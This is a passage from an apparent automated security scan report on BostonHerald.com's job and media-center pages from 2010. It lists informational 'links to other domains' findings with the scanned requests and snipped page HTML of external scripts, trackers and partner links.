<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" style="margin-right:30px;"></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif"></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

8.13. http://bostonherald.com/jobfind/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/jobfind/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/jobfind/?srvc=home&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fjobfind%2F&c5=&c6=&c15=
http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif
http://bh.heraldinteractive.com/images/siteImages/jobfind/salaryWizardLogo.gif
http://bh.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindFeaturedEmployer.gif
http://bh.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindWhatAreYouWorth.gif
http://bh.heraldinteractive.com/jobfind/resume_edge/
http://bostonherald.boocoo.com/
http://bostonherald.salary.com/salarywizard/utilityscripts/swzu_v4_jsfunc.js
http://cache.heraldinteractive.com/advertising/boocoo/boocoo.jpg
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/icons/xml3.gif
http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindJobFairs.gif
http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindNewsCorner.gif
http://cache.heraldinteractive.com/images/siteImages/viewHeraldJobsOnly.gif
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/jobfind/
http://feeds.feedburner.com/bostonherald/jobfind/news/
http://hiring.hotjobs.yahoo.com/ss/php/hjss_partners.php?P=bostonherald&dest_page=CSB
http://hiring.hotjobs.yahoo.com/ss/php/hjss_partners.php?showhiring=true&P=bostonherald
http://hotjobs.yahoo.com/
http://hotjobs.yahoo.com/create-resume
http://hotjobs.yahoo.com/diversity
http://hotjobs.yahoo.com/interview
http://hotjobs.yahoo.com/jobs-c-Accounting_Finance-l-Boston-MA
http://hotjobs.yahoo.com/jobs-c-Clerical_Administrative-l-Boston-MA
http://hotjobs.yahoo.com/jobs-c-Healthcare-l-Boston-MA
http://hotjobs.yahoo.com/jobs-c-Retail-l-Boston-MA
http://hotjobs.yahoo.com/jobs-c-Sales-l-Boston-MA
http://hotjobs.yahoo.com/jobs-c-Technology-l-Boston-MA
http://hotjobs.yahoo.com/jobs-search-advanced/
http://hotjobs.yahoo.com/jobs-search-category
http://hotjobs.yahoo.com/jobseeker/jobsearch/my_searches.html?partner=bostonherald
http://hotjobs.yahoo.com/jobseeker/jobsearch/saved_job_manager.html?partner=bostonherald
http://hotjobs.yahoo.com/jobseeker/jobsearch/search_results.html?partner=bostonherald&company_gid=597605&updated_since=anytime
http://hotjobs.yahoo.com/jobseeker/login/login.html?.done=http%3A%2F%2Fhotjobs.yahoo.com%2Fjobseeker%2Fjobsearch%2Fmy_searches.html%3Fpartner%3Dbostonherald
http://hotjobs.yahoo.com/jobseeker/myhj/resume-manager.html?partner=bostonherald
http://hotjobs.yahoo.com/networking
http://hotjobs.yahoo.com/resume
http://hotjobs.yahoo.com/salary
http://jobfind.salary.com/
http://jobfind.salary.com/CostOfLivingWizard/layoutscripts/coll_start.asp
http://jobfind.salary.com/collegetuitionplanner/layoutscripts/cltl_start.asp
http://jobfind.salary.com/execcomp/layoutscripts/excl_companysearch.asp
http://jobfind.salary.com/jobassessor/layoutscripts/joel_start.asp
http://jobfind.salary.com/millionairemaker/layoutscripts/mlcl_start.asp
http://jobfind.salary.com/salarytimer/layoutscripts/stml_start.asp
http://l.yimg.com/a/i/us/hj/gr2/monst_lo_nwsp_console_3.gif
http://l.yimg.com/a/i/us/hj/post_resume.gif
http://multimedia.heraldinteractive.com/images/20101107/stp/d24c15_pola2_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/bd6cb2_olbermann11082010.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://selfcare.hotjobs.yahoo.com/ss/php/hjss_partners.php?P=bostonherald
http://twitter.com/bostonherald
http://us.bc.yahoo.com/b?P=018URELEenI8gYLNKLm5uwaVzIkMMkzXvBgACUM7&T=17utvlsn4%2fX%3d1289206808%2fE%3d396511251%2fR%3dhojo%2fK%3d5%2fV%3d3.1%2fW%3dJ%2fY%3dYAHOO%2fF%3d4019169743%2fH%3dc2VydmVJZD0iMDE4VVJFTEVlbkk4Z1lMTktMbTV1d2FWeklrTU1relh2QmdBQ1VNNyIgc2l0ZUlkPSI0NDYxMDUxIiB0U3RtcD0iMTI4OTIwNjgwODYxMjA5NSIg%2fQ%3d-1%2fS%3d1%2fJ%3d237AC442
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/
https://us.lrd.yahoo.com/_ylc=X3oDMTFxZmRpYTFrBF9TAzM5NjUxMTI1MQRsaWQDcmVnaXN0ZXIEcGFydG5lcgNib3N0b25oZXJhbGQEc3JjA2NvbnNvbGU-/SIG=15hpku0jd/**https:/login.yahoo.com/config/eval_register?.last=http%3A%2F%2Fhotjobs.yahoo.com%2Fjobseeker%2Flogin%2Flogin.html%3Fpartner%3Dbostonherald&.src=hotjobs

Request

GET /jobfind/?srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:28:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>


<link rel="alternate" title="Jobfind - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/jobfind/" type="application/rss+xml">

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
   <script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fjobfind%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://hotjobs.yahoo.com/jobseeker/jobsearch/my_searches.html?partner=bostonherald">My Searches</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://hotjobs.yahoo.com/jobseeker/jobsearch/saved_job_manager.html?partner=bostonherald">My Jobs</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://hotjobs.yahoo.com/jobseeker/myhj/resume-manager.html?partner=bostonherald">My Resumes</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://jobfind.salary.com/">What are you worth?</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div class="hjConsoleHeader">
       <a target="hotjobs" href="http://hotjobs.yahoo.com" ylc="http://hotjobs.yahoo.com/;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">
           <img src="http://l.yimg.com/a/i/us/hj/gr2/monst_lo_nwsp_console_3.gif" alt="Search for jobs with Monster+HotJobs" style="border-width:0px;"/>
       </a>
...[SNIP]...
ize:11px;color:#000000;background:transparent url(http://l.yimg.com/a/i/us/hj/gr/yellow-buttons.gif) no-repeat scroll 0px 0px;height:22px;width:75px;cursor:pointer;float:right;margin-right:10px;">
               <a target="hotjobs" href="http://hotjobs.yahoo.com/jobs-search-advanced/" ylc="http://hotjobs.yahoo.com/jobs-search-advanced/;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald" style="font-size:85%;color:#004CCA;text-decoration:underline;">Advanced Search</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobseeker/login/login.html?.done=http%3A%2F%2Fhotjobs.yahoo.com%2Fjobseeker%2Fjobsearch%2Fmy_searches.html%3Fpartner%3Dbostonherald" ylc="http://hotjobs.yahoo.com/jobseeker/login/login.html;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?.done=http%3A%2F%2Fhotjobs.yahoo.com%2Fjobseeker%2Fjobsearch%2Fmy_searches.html%3Fpartner%3Dbostonherald&partner=bostonherald">Sign In</a> | <a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="https://us.lrd.yahoo.com/_ylc=X3oDMTFxZmRpYTFrBF9TAzM5NjUxMTI1MQRsaWQDcmVnaXN0ZXIEcGFydG5lcgNib3N0b25oZXJhbGQEc3JjA2NvbnNvbGU-/SIG=15hpku0jd/**https%3A//login.yahoo.com/config/eval_register%3F.last=http%253A%252F%252Fhotjobs.yahoo.com%252Fjobseeker%252Flogin%252Flogin.html%253Fpartner%253Dbostonherald%26.src=hotjobs">Register</a>
...[SNIP]...
</h1>
       <a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/resume" ylc="http://hotjobs.yahoo.com/resume;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Resumes</a> | <a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/interview" ylc="http://hotjobs.yahoo.com/interview;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Interviewing</a> | <a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/salary" ylc="http://hotjobs.yahoo.com/salary;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Salary</a><br />
       <a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/networking" ylc="http://hotjobs.yahoo.com/networking;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Networking</a> | <a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/diversity" ylc="http://hotjobs.yahoo.com/diversity;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Diversity</a>
...[SNIP]...
<div class="hjConsoleContent hjConsoleContentRight">
       <a target="hotjobs" href="http://hotjobs.yahoo.com/create-resume" ylc="http://hotjobs.yahoo.com/create-resume;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">
           <img src="http://l.yimg.com/a/i/us/hj/post_resume.gif" alt="Post Your Resume Now" style="border-width:0px;margin-left:10px;"/>
       </a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Accounting_Finance-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Accounting_Finance-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Accounting & Finance</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Clerical_Administrative-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Clerical_Administrative-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Clerical & Admin</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Healthcare-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Healthcare-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Healthcare</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Retail-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Retail-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Retail</a></li>
           <li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Sales-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Sales-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Sales</a></li>
           <li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Technology-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Technology-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Technology</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-search-category" ylc="http://hotjobs.yahoo.com/jobs-search-category;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">More Job Categories...</a>
...[SNIP]...
</span> <a href="http://hiring.hotjobs.yahoo.com/ss/php/hjss_partners.php?P=bostonherald&dest_page=CSB" style="color: rgb(0, 76, 202);">Search Resumes</a>
...[SNIP]...
</span> <a href="http://hiring.hotjobs.yahoo.com/ss/php/hjss_partners.php?showhiring=true&P=bostonherald" style="color: rgb(0, 76, 202);">Save with Starter Packs</a>
...[SNIP]...
<div style="padding-top: 5px;">HotJobs Customer? <a target="hotjobs" href="http://selfcare.hotjobs.yahoo.com/ss/php/hjss_partners.php?P=bostonherald" style="color: rgb(0, 76, 202); text-decoration: underline;">Sign In</a>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://us.bc.yahoo.com/b?P=018URELEenI8gYLNKLm5uwaVzIkMMkzXvBgACUM7&T=17utvlsn4%2fX%3d1289206808%2fE%3d396511251%2fR%3dhojo%2fK%3d5%2fV%3d3.1%2fW%3dJ%2fY%3dYAHOO%2fF%3d4019169743%2fH%3dc2VydmVJZD0iMDE4VVJFTEVlbkk4Z1lMTktMbTV1d2FWeklrTU1relh2QmdBQ1VNNyIgc2l0ZUlkPSI0NDYxMDUxIiB0U3RtcD0iMTI4OTIwNjgwODYxMjA5NSIg%2fQ%3d-1%2fS%3d1%2fJ%3d237AC442"></noscript>
...[SNIP]...
<div style="position: relative; top: -70px; left: 275px; text-align: center; background-color: white; width: 150px; border: 1px solid #666;"><a href="http://bostonherald.boocoo.com"><img src="http://cache.heraldinteractive.com/advertising/boocoo/boocoo.jpg" border="0" /></a></div>

            <a href="http://hotjobs.yahoo.com/jobseeker/jobsearch/search_results.html?partner=bostonherald&company_gid=597605&updated_since=anytime"><img src="http://cache.heraldinteractive.com/images/siteImages/viewHeraldJobsOnly.gif"></a>
...[SNIP]...
<div class="jobfindDivTop"><img src="http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindNewsCorner.gif" alt="Jobfind News Corner" /></div>
...[SNIP]...
</a>
        <a href="http://feeds.feedburner.com/bostonherald/jobfind/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xml3.gif" alt="XML" /></a>
...[SNIP]...
</div>
                           <img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/20101107/stp/d24c15_pola2_11082010.jpg" alt="Photo" />
                       <span class="ArticleSummary">
...[SNIP]...
</div>
                           <img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/20101108/stp/bd6cb2_olbermann11082010.jpg" alt="Photo" />
                       <span class="ArticleSummary">
...[SNIP]...
</div>
<img src="http://bh.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindFeaturedEmployer.gif" alt="Jobfind Featured Employers" />
</div>
...[SNIP]...
<a href="/jobfind/calendar/"><img src="http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindJobFairs.gif" alt="Jobfind Job Fairs" /></a>
...[SNIP]...
<br />
+ <a class="LinksDarkRedNone" href="http://bh.heraldinteractive.com/jobfind/resume_edge/">Build the perfect resume now!</a>
...[SNIP]...
<div class="jobfindDivTop">
<a href="http://jobfind.salary.com"><img src="http://bh.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindWhatAreYouWorth.gif" alt="Jobfind Job Salary Wizard" /></a>
...[SNIP]...
<form name="newsearchform" method="get" action="http://jobfind.salary.com/salarywizard/layoutscripts/swzl_titleselect.asp" onsubmit="return gotoTitleSelect();"><script language="javascript" src="http://bostonherald.salary.com/salarywizard/utilityscripts/swzu_v4_jsfunc.js"></script>
...[SNIP]...
<li><a href="http://jobfind.salary.com"><img src="http://bh.heraldinteractive.com/images/siteImages/jobfind/salaryWizardLogo.gif" alt="Jobfind Job Salary Wizard"></a>
...[SNIP]...
<div id="jobfindSalaryDoubleDivLeft">
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" /> <a href="http://jobfind.salary.com/CostOfLivingWizard/layoutscripts/coll_start.asp">Cost of Living Wizard</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" /> <a href="http://jobfind.salary.com/jobassessor/layoutscripts/joel_start.asp">Job Assessor</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" /> <a href="http://jobfind.salary.com/collegetuitionplanner/layoutscripts/cltl_start.asp">College Tuition Planner</a>
...[SNIP]...
<div id="jobfindSalaryDoubleDivRight">
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" /> <a href="http://jobfind.salary.com/millionairemaker/layoutscripts/mlcl_start.asp">How long until you make a million?</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" /> <a href="http://jobfind.salary.com/salarytimer/layoutscripts/stml_start.asp">Compare yourself to the power players</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" /> <a href="http://jobfind.salary.com/execcomp/layoutscripts/excl_companysearch.asp">Executive Compensation Wizard</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.14. http://bostonherald.com/mediacenter/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/mediacenter/index.php?media_type_photo=0&media_type_video=1&media_type_audio=0

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fmediacenter%2Findex.php%3Fmedia_type_photo%3D0%26media_type_video%3D1%26media_type_audio%3D0&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://buyheraldphotos.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/ajax-loader-big-blackBg.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPhoto.png
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniVideo.png
http://cache.heraldinteractive.com/images/siteImages/icons/photos.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png
http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/purchasePhotos.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mediacenter/btn_order_prints_yellow.png
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/lightbox.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cache.heraldinteractive.com/js/tooltips.js?fresh=445
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/mediacenter/
http://gallery.pictopia.com/bostonherald/
http://gallery.pictopia.com/bostonherald/gallery/Edge/Tiffany's%20new%20handbag%20line
http://gallery.pictopia.com/bostonherald/gallery/News/2010%20Mass.%20election
http://gallery.pictopia.com/bostonherald/gallery/News/Campaign%20trail
http://gallery.pictopia.com/bostonherald/gallery/News/Candidate%20Gallery
http://gallery.pictopia.com/bostonherald/gallery/News/Candidates%20prepare%20for%20Election%20Day
http://gallery.pictopia.com/bostonherald/gallery/News/Charlie%20Baker%20and%20Jeff%20Perry%20campaign
http://gallery.pictopia.com/bostonherald/gallery/News/Columbus%20day%20celebration
http://gallery.pictopia.com/bostonherald/gallery/News/Funeral%20for%20a%20mother%20and%20child
http://gallery.pictopia.com/bostonherald/gallery/News/Gov%20candidates%20around%20town
http://gallery.pictopia.com/bostonherald/gallery/News/Gov.%20race
http://gallery.pictopia.com/bostonherald/gallery/News/Graffiti%20crackdown
http://gallery.pictopia.com/bostonherald/gallery/News/Gubernatorial%20candidates%20campaign
http://gallery.pictopia.com/bostonherald/gallery/News/Gubernatorial%20showdown
http://gallery.pictopia.com/bostonherald/gallery/News/Head%20of%20the%20Charles%20Regatta
http://gallery.pictopia.com/bostonherald/gallery/News/House%20explodes%20in%20Hyde%20Park
http://gallery.pictopia.com/bostonherald/gallery/News/Iraqi%20rowers
http://gallery.pictopia.com/bostonherald/gallery/News/Keating%20rallies%20support
http://gallery.pictopia.com/bostonherald/gallery/News/Last%20days%20on%20the%20campaign%20trail
http://gallery.pictopia.com/bostonherald/gallery/News/Obama%20rallies%20for%20Deval%20Patrick
http://gallery.pictopia.com/bostonherald/gallery/News/One%20dead%20in%20Lynn%20shooting
http://gallery.pictopia.com/bostonherald/gallery/News/Pet%20blessings
http://gallery.pictopia.com/bostonherald/gallery/News/RMV%20crackdown
http://gallery.pictopia.com/bostonherald/gallery/News/The%20candidates%20vote%20on%20election%20morning
http://gallery.pictopia.com/bostonherald/gallery/News/Thief%20makes%20escape%20in%20wedding%20limo
http://gallery.pictopia.com/bostonherald/gallery/News/WWII%20reenactment
http://gallery.pictopia.com/bostonherald/gallery/Sports/BC%2016,%20James%20Madison%2010
http://gallery.pictopia.com/bostonherald/gallery/Sports/BC%20football
http://gallery.pictopia.com/bostonherald/gallery/Sports/Bruins%20pratice
http://gallery.pictopia.com/bostonherald/gallery/Sports/Celtics%20110,%20Bulls%20105
http://gallery.pictopia.com/bostonherald/gallery/Sports/Celtics%2088,%20Heat%2080
http://gallery.pictopia.com/bostonherald/gallery/Sports/Celtics%20practice
http://gallery.pictopia.com/bostonherald/gallery/Sports/Division%202%20golf%20state%20championships
http://gallery.pictopia.com/bostonherald/gallery/Sports/Marco%20Sturm%20nets%20stylish%20choices
http://gallery.pictopia.com/bostonherald/gallery/Sports/Maryland%2024,%20Boston%20College%2021
http://gallery.pictopia.com/bostonherald/gallery/Sports/Patriots%20-%20Saturday
